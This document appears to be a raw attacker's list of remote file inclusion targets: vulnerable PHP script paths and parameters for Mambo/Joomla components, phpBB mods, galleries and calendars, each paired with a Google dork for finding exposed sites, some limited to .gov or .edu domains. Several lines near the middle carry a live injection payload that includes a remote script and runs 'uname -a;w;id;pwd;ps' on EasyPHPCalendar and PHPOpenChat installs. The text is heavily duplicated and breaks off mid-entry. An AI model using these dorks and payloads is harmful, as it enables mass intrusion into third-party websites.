allinurl:test.php?page=&lt;br /&gt;components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "inurl:com_phpshop"&lt;br /&gt;akocomments.php?mosConfig_absolute_path= inurl:akocomments.php&lt;br /&gt;index.php?page= inurl:"edu/index.php?page=*.php"&lt;br /&gt;*.php?page= inurl:*.php?page=*.php"&lt;br /&gt;index.php?oldal= inurl:"index.php?oldal=*.php"&lt;br /&gt;index.php?lang=gr&amp;file inurl:"index.php?lang=gr&amp;file=*.php"&lt;br /&gt;index.php?pag= inurl:"index.php?pag=*.php"&lt;br /&gt;index.php?incl= inurl:"index.php?incl="&lt;br /&gt;avatar.php?page= inurl:"avatar.php?page="&lt;br /&gt;index.php?_REQUEST=&amp;_REQUEST%5boption%5d=com_content&amp;_REQUEST%5bItemid%5d=1&amp;GLOBALS=&amp;mosConfig_absolute_path= "Mambo is A Free&lt;br /&gt;index.php?_REQUEST=&amp;_REQUEST%5boption%5d=com_content&amp;_REQUEST%5bItemid%5d=1&amp;GLOBALS=&amp;mosConfig_absolute_path= "Mambo is"&lt;br /&gt;ndex.php?p= inurl:"edu/index.php?p=*.php"&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/&lt;br /&gt;index.php?x= inurl:"com/index.php?x=*.php"&lt;br /&gt;index.php?mode= inurl:"com/index.php?mode=*.php"&lt;br /&gt;index.php?stranica= inurl:"index.php?stranica="&lt;br /&gt;index.php?sub= inurl:"il/index.php?sub=*.php"&lt;br /&gt;index.php?id= inurl:"/index.php?id=*.php"&lt;br /&gt;index.php?t= inurl:"/index.php?t=*.php"&lt;br /&gt;index.php?r= inurl:"index.php?r=*.php"&lt;br /&gt;index.php?menu= inurl:"net/index.php?menu=*.php"&lt;br /&gt;index.php?pag= inurl:"com/index.php?pag=*.php"&lt;br /&gt;solpot.html?body= allinurl: "solpot.html?body" &lt;br /&gt;port.php?content= inurl:port.php?content=*.php"&lt;br /&gt;index0.php?show= inurl:index0.php?show=*.php"&lt;br /&gt;administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"&lt;br /&gt;/tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository&lt;br /&gt;/tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php site:br&lt;br /&gt;administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler"&lt;br /&gt;content.php?page= inurl:"*content.php?page=*.php"&lt;br /&gt;index.php?topic= inurl:"/index.php?topic=*.php"&lt;br /&gt;index.php?u= inurl:"/index.php?u=*.php"&lt;br /&gt;administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:"com_linkdirectory"&lt;br /&gt;administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:".tr./components"&lt;br /&gt;modules/My_eGallery/index.php?basepath= inurl:"My_eGallery"&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root= inurl:"vwar"&lt;br /&gt;index.php?loc= allinurl:.br/index.php?loc=&lt;br /&gt;administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"&lt;br /&gt;administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:"com_cropimage"&lt;br /&gt;/tags.php?BBCodeFile= intitle:"Tagger LE" inurl:tags.php&lt;br /&gt;myevent.php?myevent_path= inurl:myevent.php&lt;br /&gt;/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:"com_uhp"&lt;br /&gt;myevent.php?myevent_path= inurl:"uk/myevent.php&lt;br /&gt;includes/functions.php?phpbb_root_path= powered by Integramod&lt;br /&gt;m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?&lt;br /&gt;/tags.php?BBCodeFile= intitle:"Tagger LE" inurl:"uk/tags.php&lt;br /&gt;administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_remository&lt;br /&gt;show.php?path= inurl:fclick&lt;br /&gt;show.php?path= inurl:.ac.uk/fclick&lt;br /&gt;administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:".de.*/com_linkdirectory"&lt;br /&gt;administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:"com_a6mambocredits"&lt;br /&gt;index.php?template= inurl:"index.php?"&lt;br /&gt;search.php?cutepath= inurl:"search.php?"&lt;br /&gt;show_news.php?cutepath= inurl:"show_news.php?"&lt;br /&gt;page.php?doc= allinurl:"page.php?doc="&lt;br /&gt;administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:"com_webring"&lt;br /&gt;administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:".de.*/com_mgm"&lt;br /&gt;help.php?css_path= inurl:phplive site:.ru&lt;br /&gt;components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:"com_galleria/"&lt;br /&gt;big.php?pathtotemplate= inurl:".de.*"big.php?"&lt;br /&gt;includes/search.php?GlobalSettings[templatesDirectory]= inurl:".com"search.php?"&lt;br /&gt;interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= "Papoo CMS"&lt;br /&gt;/functions.php?include_path= "powered by: phpecard"&lt;br /&gt;modules/My_eGallery/index.php?basepath= inurl:".de.*"My_eGallery"&lt;br /&gt;components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:".net.*"com_galleria/"&lt;br /&gt;/includes/orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]= "powered by CubeCart 3.0.6" &lt;br /&gt;/class.mysql.php?path_to_bt_dir= "powered by paBugs 2.0 Beta 3" &lt;br /&gt;/include/footer.inc.php?_AMLconfig[cfg_serverpath]= "powered by AllMyLinks"&lt;br /&gt;/squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/ &lt;br /&gt;index2.php?to= inurl:"/index2.php?to=*.php"&lt;br /&gt;index.php?load= inurl:"/index.php?load=*.php"&lt;br /&gt;home.php?pagina= inurl:"home.php?pagina="&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine&lt;br /&gt;/modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums&lt;br /&gt;/modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar&lt;br /&gt;/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum&lt;br /&gt;/include/write.php?dir= allinurl:/zboard/zboard.php&lt;br /&gt;db.php?path_local= inurl:"db.php?path_local="&lt;br /&gt;index.php?site= inurl:"index.php?site="&lt;br /&gt;index.php?url= inurl:"index.php?url="&lt;br /&gt;index.php?p= inurl:"index.php?p="&lt;br /&gt;index.php?openfile= inurl:"index.php?openfile="&lt;br /&gt;index.php?file= inurl:"index.php?file="&lt;br /&gt;index.php?go= inurl:"index.php?go="&lt;br /&gt;index.php?content= inurl:"index.php?content="&lt;br /&gt;index.php?side= inurl:"index.php?side="&lt;br /&gt;index.php?kobr= inurl:"index.php?kobr="index.php?pg= inurl:"index.php?pg="&lt;br /&gt;index.php?doc= inurl:"index.php?doc="&lt;br /&gt;index.php?l= inurl:"index.php?l="&lt;br /&gt;index.php?a= inurl:"index.php?a="&lt;br /&gt;index.php?principal= inurl:"index.php?principal="&lt;br /&gt;index.php?show= inurl:"index.php?show="&lt;br /&gt;index.php?opcao= inurl:"index.php?opcao="&lt;br /&gt;index.php?conteudo= inurl:"index.php?conteudo="&lt;br /&gt;index.php?meio= inurl:"index.php?meio="&lt;br /&gt;index.php?inc= inurl:"index.php?inc="&lt;br /&gt;index.php?c= inurl:"index.php?c="&lt;br /&gt;index.php?rage= inurl:"index.php?rage="&lt;br /&gt;index.php?arquivo= inurl:"index.php?arquivo="&lt;br /&gt;index.php?nic= inurl:"index.php?nic="&lt;br /&gt;index.php?x= inurl:"index.php?x="&lt;br /&gt;components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= inurl:"com_mtree"&lt;br /&gt;index.php?place= inurl:"index.php?place="&lt;br /&gt;index.php?show= inurl:"index.php?show="&lt;br /&gt;index.php?dsp= inurl:"index.php?dsp="&lt;br /&gt;index.php?dept= inurl:"index.php?dept="&lt;br /&gt;index.php?lg= inurl:"index.php?lg="&lt;br /&gt;index.php?inhalt= inurl:"index.php?inhalt="&lt;br /&gt;index.php?ort= inurl:"index.php?ort="&lt;br /&gt;index.php?pilih= inurl:"index.php?pilih="&lt;br /&gt;principal.php?conteudo= inurl:"principal.php?conteudo="&lt;br /&gt;main.php?site= inurl:"main.php?site="&lt;br /&gt;template.php?pagina= inurl:"template.php?pagina="&lt;br /&gt;contenido.php?sec= inurl:"contenido.php?sec="&lt;br /&gt;index_principal.php?pagina= inurl:"index_principal.php?pagina="&lt;br /&gt;template.php?name= inurl:"template.php?name="&lt;br /&gt;forum.php?act= inurl:"forum.php?act="&lt;br /&gt;home.php?action= inurl:"home.php?action="&lt;br /&gt;home.php?pagina= inurl:"home.php?pagina="&lt;br /&gt;noticias.php?arq= inurl:"noticias.php?arq="&lt;br /&gt;main.php?x= inurl:"main.php?x="&lt;br /&gt;main.php?page= inurl:"main.php?page="&lt;br /&gt;default.php?page= inurl:"default.php?page="&lt;br /&gt;index.php?cont= inurl:"index.php?cont="&lt;br /&gt;index.php?configFile= inurl:"index.php?configFile="&lt;br /&gt;index.php?meio.php= inurl:"index.php?meio.php="&lt;br /&gt;index.php?include= inurl:"index.php?include="&lt;br /&gt;index.php?open= inurl:"index.php?open=&lt;br /&gt;index.php?visualizar= inurl:"index.php?visualizar="&lt;br /&gt;index.php?x= inurl:"index.php?x="&lt;br /&gt;index.php?pag= inurl:"index.php?pag="&lt;br /&gt;index.php?cat= inurl:"index.php?cat="&lt;br /&gt;index.php?action= inurl:"index.php?action="&lt;br /&gt;index.php?do= inurl:"index.php?do="&lt;br /&gt;index2.php?x= inurl:"index2.php?x="&lt;br /&gt;index2.php?content= inurl:"index2.php?content="&lt;br /&gt;main.php?pagina= inurl:"main.php?pagina="&lt;br /&gt;index.phpmain.php?x= inurl:"index.phpmain.php?x="&lt;br /&gt;index.php?link= inurl:"index.php?link="&lt;br /&gt;index.php?canal= inurl:"index.php?canal="&lt;br /&gt;index.php?screen= inurl:"index.php?screen="&lt;br /&gt;index.php?langc= inurl:"index.php?langc="&lt;br /&gt;services.php?page= inurl:"services.php?page="&lt;br /&gt;htmltonuke.php?filnavn= inurl:"htmltonuke.php?filnavn="&lt;br /&gt;ihm.php?p= inurl:"ihm.php?p="&lt;br /&gt;default.php?page= inurl:"default.php?page="&lt;br /&gt;folder.php?id= inurl:"folder.php?id="&lt;br /&gt;index.php?Load= inurl:"index.php?Load="&lt;br /&gt;index.php?Language= inurl:"index.php?Language="&lt;br /&gt;hall.php?file= inurl:"hall.php?file="&lt;br /&gt;hall.php?page= inurl:"hall.php?page="&lt;br /&gt;template.php?goto= inurl:"template.php?goto="&lt;br /&gt;video.php?content= inurl:"video.php?content="&lt;br /&gt;pages.php?page= inurl:"pages.php?page="&lt;br /&gt;print.php?page= inurl:"print.php?page="&lt;br /&gt;show.php?page= inurl:"show.php?page="&lt;br /&gt;view.php?page= inurl:"view.php?page="&lt;br /&gt;media.php?page= inurl:"media.php?page="&lt;br /&gt;index1.php?choix= inurl:"index1.php?choix="&lt;br /&gt;index1.php?menu= inurl:"index1.php?menu"&lt;br /&gt;index.php?ort= inurl:"index.php?ort="&lt;br /&gt;index2.php?showpage= inurl:"index2.php?showpage="&lt;br /&gt;index2.php?ascii_seite= inurl:"index2.php?ascii_seite="&lt;br /&gt;index2.php?DoAction= inurl:"index2.php?DoAction="&lt;br /&gt;index2.php?ID= inurl:"index2.php?ID="&lt;br /&gt;index2.php?url_page= inurl:"index2.php?url_page="&lt;br /&gt;index1.php?dat= inurl:"index1.php?dat="&lt;br /&gt;index1.php?site= inurl:"index1.php?site="&lt;br /&gt;index0.php?show= inurl:"index0.php?show="&lt;br /&gt;home.php?content= inurl:"home.php?content="&lt;br /&gt;port.php?content= inurl:"port.php?content="&lt;br /&gt;main.php?link= inurl:"main.php?link="&lt;br /&gt;home.php?x= inurl:"home.php?x="&lt;br /&gt;index1.php?x= inurl:"index1.php?x="&lt;br /&gt;index2.php?x= inurl:"index2.php?x="&lt;br /&gt;main.php?x= inurl:"main.php?x="&lt;br /&gt;homepage.php?sel= inurl:"homepage.php?sel="&lt;br /&gt;/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/&lt;br /&gt;/modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/&lt;br /&gt;/include/main.php?config[search_disp]=true&amp;include_dir= allinurl:/osticket/&lt;br /&gt;/contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php&lt;br /&gt;/phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php&lt;br /&gt;/photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum&lt;br /&gt;/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"&lt;br /&gt;/bz/squito/photolist.inc.php?photoroot= "Squitosoft All Rights Reserved"&lt;br /&gt;/ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=*&lt;br /&gt;/spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang=&lt;br /&gt;/classes.php?LOCAL_PATH= "powered by siteframe"&lt;br /&gt;al_initialize.php?alpath= "Powered by AutoLinks Pro"&lt;br /&gt;/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/*&lt;br /&gt;/index.php?_REQUEST=&amp;_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path= "Powered by Mambo" inurl:*gov*&lt;br /&gt;/extensions/moblog/moblog_lib.php?basedir= "powered by pivot"&lt;br /&gt;/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= "phpCodeGenie v. 3.0.2"&lt;br /&gt;components/com_performs/performs.php?mosConfig_absolute_path= inurl:"com_performs"&lt;br /&gt;modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:"AllMyGuests"&lt;br /&gt;/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:"com_rsgallery"&lt;br /&gt;/components/com_smf/smf.php?mosConfig_absolute_path= allinurl:"com_smf"&lt;br /&gt;/components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg&lt;br /&gt;administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:"com_peoplebook"&lt;br /&gt;/admin_modules/admin_module_deldir.inc.php?config[path_src_include]= "Powered by yappa-ng 2.3.1"&lt;br /&gt;inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= "Script r?alis? par BinGo PHP"&lt;br /&gt;/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:"/com_mtree/"&lt;br /&gt;/jscript.php?my_ms[root]= intitle:"myspeach" inurl:"chat_exemple.php"&lt;br /&gt;/popup_window.php?site_isp_root= inurl:"Squirrelcart"&lt;br /&gt;/yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse&lt;br /&gt;/include/main.php?config[search_disp]=true&amp;include_dir= allinurl:/osticket/ site:fr&lt;br /&gt;/include/main.php?config[search_disp]=true&amp;include_dir= allinurl:/osticket/ site:us&lt;br /&gt;/includes/functions_portal.php?phpbb_root_path= "powered by Integramod"&lt;br /&gt;/includes/header.php?systempath=&lt;br /&gt;/Gallery/displayCategory.php?basepath=&lt;br /&gt;/index.inc.php?PATH_Includes=&lt;br /&gt;/nphp/nphpd.php?nphp_config[LangFile]=&lt;br /&gt;/include/db.php?GLOBALS[rootdp]=&lt;br /&gt;/ashnews.php?pathtoashnews=&lt;br /&gt;/ashheadlines.php?pathtoashnews=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/demo/includes/init.php?user_inc=&lt;br /&gt;/jaf/index.php?show=&lt;br /&gt;/inc/shows.inc.php?cutepath=&lt;br /&gt;/poll/admin/common.inc.php?base_path=&lt;br /&gt;/pollvote/pollvote.php?pollname=&lt;br /&gt;/sources/post.php?fil_config=&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;/bb_lib/checkdb.inc.php?libpach=&lt;br /&gt;/include/livre_include.php?no_connect=lol&amp;chem_absolu=&lt;br /&gt;/index.php?from_market=Y&amp;pageurl=&lt;br /&gt;/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;/derniers_commentaires.php?rep=&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=&lt;br /&gt;/coppermine/themes/maze/theme.php?THEME_DIR=&lt;br /&gt;/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=&lt;br /&gt;/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=&lt;br /&gt;/myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/main.php?page=&lt;br /&gt;/default.php?page=&lt;br /&gt;/index.php?action=&lt;br /&gt;/index1.php?p=&lt;br /&gt;/index2.php?x=&lt;br /&gt;/index2.php?content=&lt;br /&gt;/index.php?conteudo=&lt;br /&gt;/index.php?cat=&lt;br /&gt;/include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;/shoutbox/expanded.php?conf=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;/library/editor/editor.php?root=&lt;br /&gt;/library/lib.php?root=&lt;br /&gt;/e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;/zentrack/index.php?configFile=&lt;br /&gt;/main.php?x=&lt;br /&gt;/becommunity/community/index.php?pageurl=&lt;br /&gt;/GradeMap/index.php?page=&lt;br /&gt;/phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&amp;cmd=uname -a;w;id;pwd;ps&lt;br /&gt;(www.google.com =&gt; intitle:PHPOpenChat exthp)&lt;br /&gt;&lt;br /&gt;/calendar/calendar.php?serverPath=/.xpl/asc?&amp;cmd=uname -a;w;id;pwd;ps&lt;br /&gt;/calendar/functions/popup.php?serverPath=/.xpl/asc?&amp;cmd=uname -a;w;id;pwd;ps&lt;br /&gt;/calendar/events/header.inc.php?serverPath=/.xpl/asc?&amp;cmd=uname -a;w;id;pwd;ps&lt;br /&gt;/calendar/events/datePicker.php?serverPath=/.xpl/asc?&amp;cmd=uname -a;w;id;pwd;ps&lt;br /&gt;/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&amp;cmd=uname -a;w;id;pwd;ps&lt;br /&gt;/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&amp;cmd=uname -a;w;id;pwd;ps&lt;br /&gt;(www.google.com =&gt; intitle:"EasyPHPCalendar" exthp)&lt;br /&gt;&lt;br /&gt;/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=&lt;br /&gt;/zentrack/index.php?configFile=&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;/inc/header.php/step_one.php?server_inc=&lt;br /&gt;/install/index.php?lng=../../include/main.inc&amp;G_PATH=&lt;br /&gt;/inc/pipe.php?HCL_path=&lt;br /&gt;/include/write.php?dir=&lt;br /&gt;/include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;/includes/header.php?systempath=&lt;br /&gt;/support/mailling/maillist/inc/initdb.php?absolute_path=&lt;br /&gt;/coppercop/theme.php?THEME_DIR=&lt;br /&gt;/zentrack/index.php?configFile=&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;/inc/header.php/step_one.php?server_inc=&lt;br /&gt;/install/index.php?lng=../../include/main.inc&amp;G_PATH=&lt;br /&gt;/inc/pipe.php?HCL_path=&lt;br /&gt;/include/write.php?dir=&lt;br /&gt;/include/new-visitor.inc.php?lvc_include_dir=&lt;br /&gt;/includes/header.php?systempath=&lt;br /&gt;/support/mailling/maillist/inc/initdb.php?absolute_path=&lt;br /&gt;/coppercop/theme.php?THEME_DIR=&lt;br /&gt;/becommunity/community/index.php?pageurl=&lt;br /&gt;/shoutbox/expanded.php?conf=&lt;br /&gt;/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;/myPHPCalendar/admin.php?cal_dir=&lt;br /&gt;/yabbse/Sources/Packages.php?sourcedir=&lt;br /&gt;/zboard/zboard.php&lt;br /&gt;/path_of_cpcommerce/_functions.php?prefix&lt;br /&gt;/dotproject/modules/projects/addedit.php?root_dir=&lt;br /&gt;/dotproject/modules/projects/view.php?root_dir=&lt;br /&gt;/dotproject/modules/projects/vw_files.php?root_dir=&lt;br /&gt;/dotproject/modules/tasks/addedit.php?root_dir=&lt;br /&gt;/dotproject/modules/tasks/viewgantt.php?root_dir=&lt;br /&gt;/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;/modules/My_eGallery/public/displayCategory.php?basepath=&lt;br /&gt;/modules/4nAlbum/public/displayCategory.php?basepath=&lt;br /&gt;/modules/coppermine/themes/default/theme.php?THEME_DIR=&lt;br /&gt;/modules/agendax/addevent.inc.php?agendax_path=&lt;br /&gt;/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=&lt;br /&gt;/modules/coppermine/include/init.inc.php?CPG_M_DIR=&lt;br /&gt;/modules/mod_mainmenu.php?mosConfig_absolute_path=&lt;br /&gt;/shoutbox/expanded.php?conf=&lt;br /&gt;/pivot/modules/module_db.php?pivot_path=&lt;br /&gt;/library/editor/editor.php?root=&lt;br /&gt;/library/lib.php?root=&lt;br /&gt;/e107/e107_handlers/secure_img_render.php?p=&lt;br /&gt;/main.php?x=&lt;br /&gt;/main.php?page=&lt;br /&gt;/default.php?page=&lt;br /&gt;/index.php?meio.php=&lt;br /&gt;/index.php?include= | /index.php?inc= | /index.php?page= | /index.php?pag= | /index.php?p=&lt;br /&gt;/index.php?x= | /index.php?open= | /index.php?open= | /index.php?visualizar= | /index.php?pagina=&lt;br /&gt;/index.php?content= | /index.php?cont= | /index.php?c= | /index.php?meio= | /index.php?x=&lt;br /&gt;&lt;br /&gt;/index.php?cat= &lt;br /&gt;/index.php?site= &lt;br /&gt;/index.php?configFile= &lt;br /&gt;/index.php?action= &lt;br /&gt;/index.php?do=&lt;br /&gt;/index2.php?x= &lt;br /&gt;/index2.php?content= &lt;br /&gt;/template.php?pagina= &lt;br /&gt;/inc/step_one_tables.php?server_inc=&lt;br /&gt;/GradeMap/index.php?page= &lt;br /&gt;/phpshop/index.php?base_dir= &lt;br /&gt;/admin.php?cal_dir=&lt;br /&gt;/path_of_cpcommerce/_functions.php?prefix= &lt;br /&gt;/contacts.php?cal_dir= &lt;br /&gt;/convert-date.php?cal_dir=&lt;br /&gt;/album_portal.php?phpbb_root_path=&lt;br /&gt;/mainfile.php?MAIN_PATH=&lt;br /&gt;/dotproject/modules/files/index_table.php?root_dir=&lt;br /&gt;/html/affich.php?base=&lt;br /&gt;/gallery/init.php?HTTP_POST_VARS=&lt;br /&gt;/pm/lib.inc.php?pm_path=&lt;br /&gt;/ideabox/include.php?gorumDir=&lt;br /&gt;index2.php?includes_dir=&lt;br /&gt;forums/toplist.php?phpbb_root_path=&lt;br /&gt;forum/toplist.php?phpbb_root_path=&lt;br /&gt;admin/config_settings.tpl.php?include_path=&lt;br /&gt;include/common.php?include_path=&lt;br /&gt;event/index.php?page=&lt;br /&gt;forum/index.php?includeFooter=&lt;br /&gt;forums/index.php?includeFooter=&lt;br /&gt;forum/bb_admin.php?includeFooter=&lt;br /&gt;forums/bb_admin.php?includeFooter=&lt;br /&gt;language/lang_english/lang_activity.php?phpbb_root_path=&lt;br /&gt;forum/language/lang_english/lang_activity.php?phpbb_root_path=&lt;br /&gt;blend_data/blend_common.php?phpbb_root_path=&lt;br /&gt;master.php?root_path=&lt;br /&gt;includes/kb_constants.php?module_root_path=&lt;br /&gt;forum/includes/kb_constants.php?module_root_path=&lt;br /&gt;forums/includes/kb_constants.php?module_root_path=&lt;br /&gt;classes/adodbt/sql.php?classes_dir=&lt;br /&gt;agenda.php3?rootagenda=&lt;br /&gt;agenda2.php3?rootagenda=&lt;br /&gt;sources/lostpw.php?CONFIG[path]=&lt;br /&gt;topsites/sources/lostpw.php?CONFIG[path]=&lt;br /&gt;toplist/sources/lostpw.php?CONFIG[path]=&lt;br /&gt;sources/join.php?CONFIG[path]=&lt;br /&gt;topsites/sources/join.php?CONFIG[path]=&lt;br /&gt;toplist/sources/join.php?CONFIG[path]=&lt;br /&gt;topsite/sources/join.php?CONFIG[path]=&lt;br /&gt;public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=&lt;br /&gt;extras/poll/poll.php?file_newsportal=&lt;br /&gt;index.php?site_path=&lt;br /&gt;mail/index.php?site_path=&lt;br /&gt;fclick/show.php?path=&lt;br /&gt;show.php?path=&lt;br /&gt;calogic/reconfig.php?GLOBALS[CLPath]=&lt;br /&gt;eshow.php?Config_rootdir=&lt;br /&gt;auction/auction_common.php?phpbb_root_path=&lt;br /&gt;index.php?inc_dir=&lt;br /&gt;calendar/index.php?inc_dir=&lt;br /&gt;modules/TotalCalendar/index.php?inc_dir=&lt;br /&gt;modules/calendar/index.php?inc_dir=&lt;br /&gt;calendar/embed/day.php?path=&lt;br /&gt;ACalendar/embed/day.php?path=&lt;br /&gt;calendar/add_event.php?inc_dir=&lt;br /&gt;claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=&lt;br /&gt;claroline/auth/ldap/authldap.php?includePath=&lt;br /&gt;docebo/modules/credits/help.php?lang=&lt;br /&gt;modules/credits/help.php?lang=&lt;br /&gt;config.php?returnpath=&lt;br /&gt;editsite.php?returnpath=&lt;br /&gt;in.php?returnpath=&lt;br /&gt;addsite.php?returnpath=&lt;br /&gt;includes/pafiledb_constants.php?module_root_path=&lt;br /&gt;phpBB/includes/pafiledb_constants.php?module_root_path=&lt;br /&gt;pafiledb/includes/pafiledb_constants.php?module_root_path=&lt;br /&gt;auth/auth.php?phpbb_root_path=&lt;br /&gt;auth/auth_phpbb/phpbb_root_path=&lt;br /&gt;apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=&lt;br /&gt;apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=&lt;br /&gt;infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=&lt;br /&gt;phpdig/includes/config.php?relative_script_path=&lt;br /&gt;includes/phpdig/includes/config.php?relative_script_path=&lt;br /&gt;includes/dbal.php?eqdkp_root_path=&lt;br /&gt;eqdkp/includes/dbal.php?eqdkp_root_path=&lt;br /&gt;dkp/includes/dbal.php?eqdkp_root_path=&lt;br /&gt;path/include/SQuery/gameSpy2.php?libpath=&lt;br /&gt;include/global.php?GLOBALS[includeBit]=&lt;br /&gt;topsites/config.php?returnpath=&lt;br /&gt;manager/frontinc/prepend.php?_PX_config[manager_path]=&lt;br /&gt;ubbthreads/addpost_newpoll.php?addpoll=thispath=&lt;br /&gt;forum/addpost_newpoll.php?thispath=&lt;br /&gt;forums/addpost_newpoll.php?thispath=&lt;br /&gt;ubbthreads/ubbt.inc.php?thispath=&lt;br /&gt;forums/ubbt.inc.php?thispath=&lt;br /&gt;forum/ubbt.inc.php?thispath=&lt;br /&gt;forum/admin/addentry.php?phpbb_root_path=&lt;br /&gt;admin/addentry.php?phpbb_root_path=&lt;br /&gt;index.php?f=&lt;br /&gt;index.php?act=&lt;br /&gt;ipchat.php?root_path=&lt;br /&gt;includes/orderSuccess.inc.php?glob[rootDir]=&lt;br /&gt;stats.php?dir[func]=dir[base]=&lt;br /&gt;ladder/stats.php?dir[base]=&lt;br /&gt;ladders/stats.php?dir[base]=&lt;br /&gt;sphider/admin/configset.php?settings_dir=&lt;br /&gt;admin/configset.php?settings_dir=&lt;br /&gt;vwar/admin/admin.php?vwar_root=&lt;br /&gt;modules/vwar/admin/admin.php?vwar_root=&lt;br /&gt;modules/vWar_Account/includes/get_header.php?vwar_root=&lt;br /&gt;modules/vWar_Account/includes/functions_common.php?vwar_root2=&lt;br /&gt;sphider/admin/configset.php?settings_dir=&lt;br /&gt;admin/configset.php?settings_dir=&lt;br 